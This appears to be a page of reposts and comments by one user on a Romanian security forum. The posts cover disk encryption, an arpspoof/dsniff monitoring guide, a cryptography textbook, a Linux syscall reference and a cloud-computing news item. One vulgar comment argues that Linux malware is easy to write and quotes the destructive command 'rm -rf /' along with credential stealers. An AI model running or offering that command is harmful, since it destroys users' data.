encrypted CD and DVD disks. Full compatibility with third party boot loaders (LILO, GRUB, etc.): · Option to place boot loader on external medium and to authenticate using the key medium. · Support for key files. Download DiskCryptor Sursa: DiskCryptor - Encrypt your partitions - Penetration Testing and Security Tools
  18. Nytro
    Pe mine de ce nu ma pupa nimeni in cur?
  19. Nytro
    Mda, ce complicat e sa scrii un "malware" pentru Linux... Ai Qt, Gtk si alte tone de librarii deja existente pe majoritatea distributiilor, poti face un server complex de 20 KB prin simpla legare dinamica la astfel de librarii si cateva mii de linii de cod. Ca sa nu mai zic de Python, Perl sau chiar Shell scripting: rm -rf / , nu trebuie sa fii Torvalds ca sa faci un astfel de programel de rahat, sau un stealer de Pidgin/Mozilla si alte porcarii. Terminati cu rahaturile: "Linux nu are virusi" daca nu aveti nicio legatura cu programarea.
  20. Nytro
    And away we spoof!!! Table of Contents And away we spoof!!!..........................................................................................................................................1 Notes on stopping arpspoof, the program................................................................................................1 Dsniff utilities..........................................................................................................................................1 Bandwidth Control.............................................................................................................................................3 Bandwidth usage.................................................................................................................................................5 MRTG......................................................................................................................................................5 Interpreting MRTG..................................................................................................................................5 IP Flow Meter (ipfm)...............................................................................................................................6 Interpreting ipfm output..............................................................................................................7 IPTraf.......................................................................................................................................................8 Berkeley Packet Filter (bpf) Quickie.......................................................................................................9 Tcpdump..................................................................................................................................................9 Interpreting tcpdump traffic......................................................................................................10 NTOP.....................................................................................................................................................11 Conclusion.........................................................................................................................................................12 Defenses..............................................................................................................................................................13 Read Carefully!......................................................................................................................................13 The Heart of the monitoring............................................................................................................................15 Essential preparation........................................................................................................................................17 Software Used........................................................................................................................................18 Ripped from the Headlines..............................................................................................................................20 Ngrep......................................................................................................................................................21 Snort.......................................................................................................................................................21 Security Considerations....................................................................................................................................23 Data Security..........................................................................................................................................24 Remote Access.......................................................................................................................................25 Restricting PAM?style..........................................................................................................................27 The chosen are few................................................................................................................................28 Hand in the googie jar............................................................................................................................28 Other considerations..............................................................................................................................29 Notes.........................................................................................................................................31 Thanks................................................................................................................................................................32 'To spoof or not to spoof, that is the packet'...................................................................................................32 Dsniff 'n the Mirror..........................................................................................................................................33 Download: http://www.linuxsecurity.com/docs/PDF/dsniff-n-mirror.pdf
  21. Nytro
    Handbook of Applied Cryptography [h=4] Alfred J. Menezes, Paul C. van Oorschot and Scott A. Vanstone [/h] CRC Press ISBN: 0-8493-8523-7 October 1996, 816 pages CRC Press has generously given us permission to make all chapters available for free download. Please read this copyright notice before downloading any of the chapters. Chapter 1 - Overview of Cryptography ps pdf Chapter 2 - Mathematics Background ps pdf Chapter 3 - Number-Theoretic Reference Problems ps pdf Chapter 4 - Public-Key Parameters ps pdf Chapter 5 - Pseudorandom Bits and Sequences ps pdf Chapter 6 - Stream Ciphers ps pdf Chapter 7 - Block Ciphers ps pdf Chapter 8 - Public-Key Encryption ps pdf Chapter 9 - Hash Functions and Data Integrity ps pdf Chapter 10 - Identification and Entity Authentication ps pdf Chapter 11 - Digital Signatures ps pdf Chapter 12 - Key Establishment Protocols ps pdf Chapter 13 - Key Management Techniques ps pdf Chapter 14 - Efficient Implementation ps pdf Chapter 15 - Patents and Standards ps pdf Appendix - Bibliography of Papers from Selected Cryptographic Forums ps pdf References ps pdf Index ps pdf [h=3]About the book[/h] Words from the authors Brief table of contents Table of contents Foreword, by Ron Rivest Preface Reviews Errata (last updated July 24, 2011) Sursa: Handbook of Applied Cryptography
  22. Nytro
    LINUX System Call Quick Reference Introduction System call is the services provided by Linux kernel. In C programming, it often uses functions defined in libc which provides a wrapper for many system calls. Manual page section 2 provides more information about system calls. To get an overview, use “man 2 intro” in a command shell. It is also possible to invoke syscall() function directly. Each system call has a function number defined in <syscall.h> or <unistd.h>. Internally, system call is invokded by software interrupt 0x80 to transfer control to the kernel. System call table is defined in Linux kernel source file “arch/i386/kernel/entry.S ”. System Call Example #include <syscall.h> #include <unistd.h> #include <stdio.h> #include <sys/types.h> int main(void) { long ID1, ID2; /*-----------------------------*/ /* direct system call */ /* SYS_getpid (func no. is 20) */ /*-----------------------------*/ ID1 = syscall(SYS_getpid); printf ("syscall(SYS_getpid)=%ld\n", ID1); /*-----------------------------*/ /* "libc" wrapped system call */ /* SYS_getpid (Func No. is 20) */ /*-----------------------------*/ ID2 = getpid(); printf ("getpid()=%ld\n", ID2); return(0); } http://www.digilife.be/quickreferences/qrc/linux%20system%20call%20quick%20reference.pdf
  23. Nytro
    Eu as fi vrut sa particip la kernel, voiam sa imi fac filesystem-ul meu, dar nu am timpul necesar. Am facut doar cateva patch-uri banale care reparau diverse warning-uri/erori. Pe viitor vreau sa ma bag in Pidgin/libpurple, nu de alta, dar mai mult vreau sa invat despre YMSG.
  24. Nytro
    Cine a scris porcaria asta?
  25. Nytro
    [h=1]Americanii stiu sigur: Cloud Computingul este in ...cer[/h]de Redactia Hit | 30 august 2012 Nu este un banc, este rezultatul unui studiu. Multi americani chiar cred ca tehnologia cloud este undeva in cer. Studiul, realizat de Wakefield Research, releva ca 51% dintre americani sunt siguri ca furtunile si ploaia interfereaza direct cu serviciile cloud, care sunt "localizate" de respondenti undeva ...in cer. Mai mult, 29% dintre participantii la studiu considera ca functionarea cloud computing-ului (mai ales upload-ul si download-ul) tine in mod direct de conditiile meteo. Doar 16% dintre intervievati au raspuns ca termenul cloud computing desemneaza o retea de computere care stocheaza date. Sursa: Digitaltrends Via: Americanii stiu sigur: Cloud Computingul este in ...cer | Hit.ro
×
×
  • Create New...